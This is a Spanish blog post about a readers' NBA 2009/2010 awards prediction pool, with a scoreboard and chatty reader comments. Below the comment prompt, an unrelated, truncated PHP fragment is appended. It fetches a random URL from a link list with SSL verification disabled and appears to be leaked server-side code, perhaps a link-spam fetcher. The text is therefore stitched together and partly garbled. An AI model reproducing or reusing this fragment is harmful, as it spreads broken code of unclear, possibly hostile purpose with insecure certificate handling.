Resultados de la porra 2009/2010

11 de May de 2010 por sayim

Y finalmente aquí está el momento definitivo, las notas de junio con un mes de adelanto en forma de los resultados de la porra. A los que os fue bien ya tenéis de qué presumir y a los que no pues habrá que ir pensando alguna disculpa (mala suerte, lesiones, circunstancias inesperadas…) para justificar los resultados. De todas maneras la revancha se producirá en breve con la porra de Playoffs.

Por si alguno vive aislado en el invierno de Laponia, lleva durmiendo 6 meses o ha estado en un monasterio de clausura vamos a repasar la lista de premios sobre los que se hizo la porra:

– MVP: Lebron James
– ROY: Tyreke Evans
– MIP: Aaron Brooks
– Jugador defensivo: Dwight Howard
– Sexto hombre: Jamaal Crawford
– Entrenador del año: Scott Brooks (Thunder)
– Ejecutivo del año: John Hammond (Bucks)
– Quinteto: LeBron, Kobe, Wade, Durant y Howard
– PO Oeste: Lakers, Mavs, Denver, Utah, Suns, Thunder, Spurs y Blazers
– PO Este: Cleveland, Orlando, Atlanta Boston Chicago, Milwakee, Heat y Bobcats

Para contextualizar los resultados apuntaremos algunas consideraciones:

– Nadie acertó el premio de MIP, ejecutivo del año ni entrenador del año. Sólo tres acertaron el premio del ROY y un solo un pronóstico daba como mejor sexto hombre a Crawford.

– Por el contrario todos los pronósticos “arriesgaron” en el quinteto ideal incluyendo a Lebron y Howard (todo parece indicar que van a compartir presencia en los quintetos ideales durante algunos años). Kobe y Wade también se encontraban entre los favoritos para la mayoría. En cambio sólo cuatro partipantes apostaron por Durant. Estoy seguro que despues del pedazo de temporadón que ha hecho el año que viene estará en la mayoría de pronósticos.

– Curioso el caso de los pronósticos de los equipos de post-temporada. Nadie consiguió hacer pleno en los 16 equipos que se clasificarían. Ni siquiera hubo ningún pronóstico acertado plenamente de los 8 de una de las dos conferencias. En el Wild Wild West sólo cuatro previsiones daban a Thunder como equipo de postemporada, mientras que 24 daban a Hornets. En la conferencia Este la situación aún es más llamativa con 19 prónosticos a favor de los Pistons por ejemplo, por solo 3 a favor de los Bobcats y ninguno de los Bucks.

Y finalmente lo que todos estáis deseando. Buscaros en la tabla de acertantes esperando no estar entre los últimos. Allá va:

ACIERTOS
Txusma 19
Luis 19
HeiNeKeN 19
sergio 18
CAMPO2 18
Oscar 18
Arnau 18
Toni 18
Dantley2 18
luncus 18
TheDeerHunter 18
Chris 18
MagicJohnson32 18
Fer 17
Pcerezo 17
Kiki 17
Héctor 17
Landrusski 17
Hakeem 17
Llukas 70 16
the choosen one 16
Rojorob 16
Artabrias 16
Flea 16
Tobal 16
Kantonyo 15
Viva_Dirk 15
M 15
L.Casei 15
Love Denise 14

Independientemente de los resultados de cada uno, es para estar contentos teniendo en cuenta que de un total de 28 pronósticos, todos acertasteis por lo menos la mitad y el trío ganador lo hizo en 19. Y además ha habido atenuantes como las lesiones de Griffin u Oden.

Ya se pueden empezar a escribir las excusas…

Comenta

14 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Voy a ser el primero en poner excusas,

    Me cago en lo pistons, la lesion de Griffin y la banda de los Wizards y sus pistolitas

      Citar

  2. TheDeerHunter dice:
    #2

    con el desastre de porra que hice ya me llama la atención haber quedado en el 2º grupo con 18 puntos

    los regalos que le hago a Txusma por navidad deben de haber hecho efecto para que sea benévolo en el cálculo

      Citar

  3. Dantley2 dice:
    #3

    Bueno, en el grupito de los 18 y la verdad tampoco veo como haber acertado más salvo creer que Wade iba a hacer mala temporada.

    Enhorabuena a Txus, Luis (teleko??) y Heineken

      Citar

  4. sergio dice:
    #4

    Mucho mejor de lo que esperaba la verdad… Y más teniendo en cuenta el exceso de fe que he tenido en muchos casos. Si algunas cosas quitaran puntos por barbaridades… estaria de los ultimos jaja

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    alguien acertó el ejectutivo del año??

      Citar

  6. Uno cualquiera dice:
    #6

    aro_pasado_no_newtoniano , cito del artículo

    – Nadie acertó el premio de MIP, ejecutivo del año ni entrenador del año. Sólo tres acertaron el premio del ROY y un solo un pronóstico daba como mejor sexto hombre a Crawford.

    Mi excusa es que yo no la hice por pereza xD

    De todos modos se ve mucha igualdad en los pronósticos, sobre los 28 que hay sólo hay 5 de diferencia entre el primero y el último. Felicidades a los premiados xD

      Citar

  7. telekoman dice:
    #7

    En fin, que puedo decir, aparte de …… lamentablemente Luis no soy yo. Es decir, sí soy yo, pero no soy yo. Osea, me llamo así, pero no soy yo…… Creo que me estoy liando. Pues eso, que algún tocayo mío a acertado a tutiplen, pero no soy yo. Al final ni siquiera envié mis pronósticos, así que no puedo ser yo.

      Citar

  8. Love Denise dice:
    #8

    los últimos serán los primeros, y con acertar el ganador de la NBA me conformo, quién rie el último ríe mejor:)

      Citar

  9. kantonyo dice:
    #9

    Vaya lo mio no es apostar, aunque bueno me quedaré con lo que ha dicho sayim, 15 de 28, es un aprobado!!!

      Citar

  10. M dice:
    #10

    Mi excusa es que los que puse no hicieron lo que tenían que hacer (que para eso los puse) ;PP

      Citar

  11. pcerezo dice:
    #11

    Pues 17 de 28 no está tan mal contando con que Griffin ha caído lesionado y que nadie contaba con OKC, pero vamos que un desastre.

    Pablo

      Citar

  12. Luis dice:
    #12

    Genial!!!

      Citar

  13. Chris dice:
    #13

    El puntito de desventaja con el grupo de cabeza, lo remonto con la porra de los PO.

      Citar

  14. HeiNeKeN dice:
    #14

    no esta mal xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>